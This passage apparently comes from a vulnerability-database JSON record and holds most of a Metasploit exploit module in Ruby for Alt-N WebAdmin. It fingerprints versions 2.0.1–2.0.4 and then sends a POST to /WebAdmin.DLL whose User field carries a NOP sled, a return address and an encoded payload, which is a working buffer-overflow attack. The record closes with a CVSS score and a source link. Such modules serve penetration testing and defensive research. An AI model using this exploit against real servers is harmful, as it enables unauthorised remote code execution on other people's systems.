register_options([Opt::RPORT(1000)])\n end\n\n def exploit\n\n mytarget = target\n\n if (target.name =~ /Automatic/)\n res = send_request_raw({\n 'uri' => '/WebAdmin.DLL'\n }, -1)\n\n if (res and res.body =~ /WebAdmin.*v(2\\..*)$/)\n case $1\n when /2\\.0\\.4/\n mytarget = targets[1]\n when /2\\.0\\.3/\n mytarget = targets[2]\n when /2\\.0\\.2/\n mytarget = targets[3]\n when /2\\.0\\.1/\n mytarget = targets[4]\n else\n print_error(\"No target found for v#{$1}\")\n return\n end\n else\n print_error(\"No target found\")\n end\n end\n\n user_cook = rand_text_alphanumeric(2)\n post_data = 'User=' + make_nops(168) + [mytarget.ret].pack('V') + payload.encoded\n post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'\n\n print_status(\"Sending request...\")\n res = send_request_cgi({\n 'uri' => '/WebAdmin.DLL',\n 'query' => 'View=Logon',\n 'method' => 'POST',\n 'content-type' => 'application/x-www-form-urlencoded',\n 'cookie' => \"User=#{user_cook}; Lang=en; 
Theme=standard\",\n 'data' => post_data,\n 'headers' =>\n {\n 'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',\n 'Accept-Language' => 'en',\n 'Accept-Charset' => 'iso-8859-1,*,utf-8'\n }\n }, 5)\n\n handler\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/altn_webadmin.rb"}]}